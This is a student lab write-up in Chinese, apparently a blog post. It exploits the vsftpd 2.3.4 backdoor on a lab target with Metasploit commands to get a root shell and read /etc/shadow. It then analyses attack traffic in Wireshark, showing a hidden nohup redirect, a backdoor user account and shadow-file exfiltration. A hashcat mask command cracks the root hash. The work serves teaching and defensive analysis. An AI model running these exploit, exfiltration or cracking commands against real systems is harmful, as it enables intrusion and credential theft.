一、攻击方-渗透测试
渗透测试是老朋友了,上学期的实验就玩过,msf的自动化攻击好厉害🤩
这次渗透的目的还是拿到root用户的shell权限,有两种方法:
1、首先拿到普通用户的权限然后提权
2、直接拿到root用户的权限
方法不同利用的漏洞种类也不同,这次使用ftp2.3.4笑脸漏洞,再没有比这更快的方法了(狗头
发现漏洞:
攻击机IP为:192.168.197.135
靶机IP为:192.168.197.136
1、通过fping发现与自己在同一网段的主机,命令为fping -aqg 192.168.197.0/24,结果如下:
2、使用nmap工具扫描192.168.197.135的开放端口,命令为:nmap -T4 -sV -v 192.168.197.136
发现靶机开放了ftp21号端口
3、使用nmap扫描FTP版本号,命令为:nmap 192.168.1.2 -sV -p21,发现FTP版本号为2.3.4
4、打开msf,查看FTP2.3.4,命令为search vsftpd 2.3.4,网上查询发现ftp2.3.4有笑脸漏洞,准备利用该漏洞实施攻击
利用漏洞拿到shell权限查看shadow文件:
攻击利用ftp2.3.4的笑脸漏洞,过程如下:
1、根据第三题找到的ftp2.3.4的漏洞,选择其中一个exploit进行攻击
命令:use exploit/unix/ftp/vsftpd_234_backdoor
命令:show options查看需要设置的参数
2、命令:set RHOSTS 192.168.197.136
设置完成后exploit
3、直接取得了root用户权限,查看shadow文件:
cat /etc/shadow
二、防守方-流量分析
受害者通过自己的流量来分析攻击方的恶意行为:
一开始我逐条看流量啥也没找出来💢,用wireshark的流追踪就很方便了。
探测攻击主机信息:
攻击主机的IP地址:192.168.2.183
域名:kali.lan
主机名:kali
分析过程:
1、IP地址:在统计–>IPv4 Statistics–>All Addresses,根据占比排序,因为受害机为192.168.2.222,与192.168.2.183流量大致相同,且在同一网段,猜测攻击主机IP为192.168.2.183,在之后过滤ftp-data可以看到只有该机器从受害机那里下载了敏感文件。
2、域名和主机名:过滤DNS请求包,可以看到DNS响应报文中有攻击机192.168.2.183的主机名kali和域名kali.lan
用wireshark自带的统计–>解析后的地址,也可以确定攻击主机名。
还原攻击步骤:
利用的漏洞:ftp2.3.4笑脸漏洞
攻击步骤与流量截包分析:
1、攻击者使用ack探测包,扫描受害机的21号端口,确定目标服务器21号端口的服务版本为vsFTPd 2.3.4。
如下图:在受害机返回的2345号数据包中可以看到具体的ftp服务器版本
2、攻击者利用ftp2.3.4的笑脸漏洞,在msf上通过匿名登录到目标服务器上(用户名最后有一个笑脸:),密码任意),因为用户名最后有笑脸:),会触发恶意后门,与ftp服务器的6200端口建立tcp连接。
如下图,登录用户名为:CbNDRk:) 密码为:d6 ,受害机反弹给攻击机一个具有root权限的shell。
并且通过跟踪Tcp数据流可以发现,在4127-5040号数据包过程中该用户连接一直存在,直到5040,用户CbNDRk:)登陆超时才退出。
3、攻击者利用笑脸漏洞在ftp服务器上开启6200端口后,与ftp服务器建立tcp连接。
跟踪该tcp数据流可以看到攻击机在受害机器上,作为具有root权限的用户输入以下命令:
4183:nohup >/dev/null 2>&1 ,让受害主机包标准输出和错误输出都放到黑洞中,即在受害机上什么也不输出,让受害者无法察觉被攻击。
4194:echo回显测试
4200:查看当前系统版本
4202:查看当前用户
4215-4295:添加了一个新用户newuser
4346:将系统的passwd文件和shadow文件打包压缩为user.tgz并将其存入新用户newuser的文件夹/home/newuser,然后ls确认打包完成。
4、攻击机新建了一个tcp连接,使用新创建的newuser登录,获取user.tgz压缩文件,跟踪下一个TCP流,可以看到
4485-4489:攻击机在newuser用户下,使用port命令,让受害机作为ftp服务器通过20号端口与攻击机建立数据连接,传输user.tgz
这时传输失败,查找原因:在刚刚的root用户下查看发现user.tgz的所有者是root,newuser对user.tgz不可读写与执行
4545:攻击机在root用户下,使用命令 chmod 644 user.tgz,让newuser对user.tgz可读
4556-4563:攻击机在newuser用户下,再次使用port命令下载user.tgz文件,下载成功。
4614:用户newuser下线
5040:在前面的分析知道用户CbNDRk:)登陆超时,退出具有root权限的shell
至此攻击结束,攻击机拿到了受害机的passwd和shadow文件打包成的user.tgz压缩包。
查看攻击者破解的root口令:
1、使用ip.addr == 192.168.2.183 and ftp–data口令查看攻击机从用户机下载的user.tgz
追踪tcp流如下:
2、查看原始数据并将文件保存为2.tgz,打开压缩包查看存放用户密码的shadow文件
3、靶机root文件中密码部分拆解出来:
1 1 1AEvN/LAF$UE4aDFyWJa.AzVZkDnflq0
由头部 1 1 1知道是md5加密,根据后三位为字母msf的提示,依次猜测密码的长度,最终得到密码是八位,adminmsf
hashcat命令为:hashcat64.exe -m 500 -a 3 1 1 1AEvN/LAF$UE4aDFyWJa.AzVZkDnflq0 ?a?a?a?a?a?amsf
破解的root用户的口令为:adminmsf
三、总结
1、注意在流量分析的时候还要判断端口扫描
这里我不太懂要怎么从流量看攻击方有没有进行端口扫描,有没有小伙伴告诉我,感谢💭
2、在渗透测试时攻击方怎么确定并利用漏洞?
一开始利用漏洞时选择了服务器漏洞 apache 2.2.8+DAV2.0,通过davtest测试工具可以看到该web服务器可以执行用户上传的html,txt和php文件。使用msfvenom生成php后门程序,刷新web页面,设置msf exploit的参数,访问web页面自己上传的php后门程序,拿到shell,然后再提权,获取root用户权限才可以查看shadow文件。步骤比较多,我在访问php后门时没有拿到受害机shell,没有找到原因。
最后还是使用了经典的ftp2.3.4笑脸漏洞,设置参数后exploit可以直接取得root用户权限,省去了提权的过程,方便快速。
3、拿到shadow用户的密码后怎么用hashcat快速破解?
破解密码有很多种方式,最常见的是使用hashcat或者John the Ripper,使用hashcat的时候为了提高破解速度可以加上?l表示字母,?d表示数字,另外可以使用GPU破解加快速度,或者hash分布式破解,或者使用脚本批量破解shadow文件。
4、获取IP地址对应的主机名的方法:
获取攻击主机的信息有很多种方法,如下:
①通过wireshark的统计功能
wireshark自带的统计功能可以自动化的分析ip地址对应的主机名,方便快速。
使用方法:统计–>解析后的地址
②通过过滤条件:ip加smb,可以看到广播包info对应source IP的主机名
e.g.ip.addr eq 192.168.2.183 and smb(查看192.168.2.183对应的主机名)
③通过过滤条件:browser.server,可以查看广播包info对应source IP的主机名
④通过过滤条件:dhcp
e.g. ip.addr eq 192.168.2.183 and dhcp
⑤通过过滤条件:dns
e.g. dns
⑥通过过滤条件:Nbns
e.g. nbns
这里需要分析两条报文,一条请求报文,一条响应报文。通过这两条报文可以查看响应报文中的IP,对应回复请求报文的主机名。
在本实验中可以使用方法①和方法⑤,都可以看到192.168.2.183对应的主机名kali.lan
方法①:
方法⑤
5、确定攻击主机的用户账户名方法:
可以用这个网站:
https://packettotal.com
将数据包上传至此分析各个ip对应的用户账户名,我上传一直显示失败,无解
6、在使用ftp—data命令:ip.addr == 192.168.2.183 and ftp—data查看攻击者下载文件的时候,要注意保存原始数据,不要选择二进制格式或者ascll码格式,否则无法正常打开文件
837
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
